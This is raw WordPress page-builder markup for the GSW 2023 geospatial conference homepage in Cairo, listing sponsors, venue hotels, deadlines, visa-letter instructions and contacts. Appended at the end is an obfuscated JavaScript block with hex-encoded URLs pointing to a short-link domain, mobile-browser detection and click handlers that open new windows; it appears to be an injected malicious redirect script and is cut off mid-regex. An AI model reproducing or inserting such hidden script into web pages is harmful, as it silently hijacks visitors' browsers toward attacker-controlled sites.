class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686739986286{margin-top: -35px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1687094969343{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 